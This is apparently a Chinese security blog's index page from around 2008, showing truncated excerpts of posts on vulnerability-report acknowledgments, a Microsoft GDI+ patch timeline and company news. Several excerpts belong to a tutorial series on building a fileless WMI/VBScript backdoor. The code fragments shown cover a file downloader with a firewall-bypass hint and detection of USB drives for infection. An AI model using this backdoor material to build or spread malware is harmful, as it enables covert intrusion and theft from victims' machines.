漏洞报告致谢 - 80sec的kEvin In D

致谢：80sec的kEvin In D

• 报告反映问题
  2008年报告，QQ对战平台本地crash问题

• 分析结果
  该问题实际因为Microsoft MFC库中一个函数的堆溢出BUG导致。由于是unexploitable，本地触发并且有非常严格的额外条件限制，该问题风险等级定位为低，将不会被以安全更新形式修复。会等待微软的SP或

今天是腾讯成立十周年，记录一下。祝公司越来越好

今天又是光棍节，祝单身的同学们早日有好归宿

睡觉。

这个栏目是受到大牛蛙同学的《为什么发布漏洞报告致谢》的启发。

主要目的也一样：

对于那些向我们积极反馈腾讯的安全问题/漏洞，帮助我们改进我们的安全工作的同学表达我们的谢意。不论是否是一个严重的安全问题，我们都非常欢迎。

虽然是一个非官方的感谢，我也只是负责腾讯安全漏洞响应的

Welcome!各位ScriptKid，欢迎来到脚本世界。

时隔2个月，终于进行到这一篇。有些标题党了，哈哈。其实我想通过这篇文章说明的是：做安全，真不容易啊。。。

这个蠕虫写于2006年中左右，为了演示XSS漏洞的危害。我记得当时在给公司的开发同事培训WEB安全时，有同事对我说：脚本是执行在客户端的，XSS漏洞关我什么事呀，又不会影响我的服务器和服务。

确实，给开发的同事和不大懂安全的BOSS们进行安全教育，解释什么叫网络安全，是个艰巨和长期的任务。往往一个真实的攻击实例演示，一次安全事件比你讲个几次

前段时间非常饱和，校园招聘加上公司的事比较多，一直没心思更新Blog。

说一个去成都校招时挺有意思的现象，每个面试的同学，我都问了这样一个问题：

你正在负责公司的一个重大项目，这个时候你接到家里的急电：母亲病危，速回。但如果这个时候你回去，公司在这个项目上将受到上千万的重大损失。请问你会怎么做？

所有的面试的同学都选择了：在公司稳定/做好项目再回去。

工作真的比亲情重要？抑或只是想给面试官一个印象：我工作很尽责哦。不过这道面试题是考察一个

发生快一年了，终于判了。

人做事，天在看

http://tech.qq.com/a/20080912/000337.htm

PS：用的就是今年爆出来的那个著名的DNS漏洞，侧面反映咱们天朝黑客果然牛X，咱们去年就开始用这个搂钱了

最近MS08-052这个公告闹得沸沸扬扬，据说外面已经有人开始卖了。

QQ由于是优先使用的自己目录下的gdiplus，所以大家除了安装MS的补丁以外，还必须安装QQ推送的补丁。这里我们强烈建议大家使用官方推送的补丁，本次补丁还一并修正了QQ某些其他业务客户端的gdiplus问题。

2008.9.9 MS公告

2008.9.10 QQ安全中心内部预警公告，各部门开始各版本补丁制作

2008.9.11-12 补丁推送开始

如

今天给大家带来这个连载的最后一篇。

通过前面的几篇连载，有一定脚本编写功底和WMI技术知识的同学经过一定的修改，其实已经可以实现我们的这个无进程，无文件驻留，无端口的后门以及前面所说的下载者，U盘识别和感染等等功能。当然了，如果想真正实现对后门的控制，你还要有一个WEB SERVER以及一个管理端。如下图：

Welcome!各位ScriptKid，欢迎来到脚本世界。

终于到周末。可以多陪陪家人，玩玩游戏，研究研究自己感兴趣的东西了。

今天继续的是两个很简单的功能，下载指定文件到目标机器与获取目标机器任意文件。

直接来看示例代码。

Downloader

Function DownLoadFile
Set Http=CreateObject("WinHttp.WinHttpRequest.5.1") //想绕过防火墙请使用InternetExplorer.Application
SplitCmd=Split(CmdText,"|") //分离命令参数。命令格式是：命令号|远程URL|本地文件|超时时间

Welcome!各位ScriptKid，欢迎来到脚本世界。

一个好的后门，肯定要有一个比较好的传播方式。比如读取本地联系人列表发送邮件，U盘感染，QQ,MSN传播等等。利用WMI提供的强大windows管理接口来实现多样的传播方式非常简单。这里我只介绍一下U盘方式。

Win32_LogicalDisk类提供了很好的识别各类驱动器的接口。我们可以很轻易的识别出我们可以感染的移动设备。来看代码：

Function DetectDisk
Set DiskInfos=WMIService.ExecQuery("Select * from Win32_LogicalDisk") //查询本机所有逻辑盘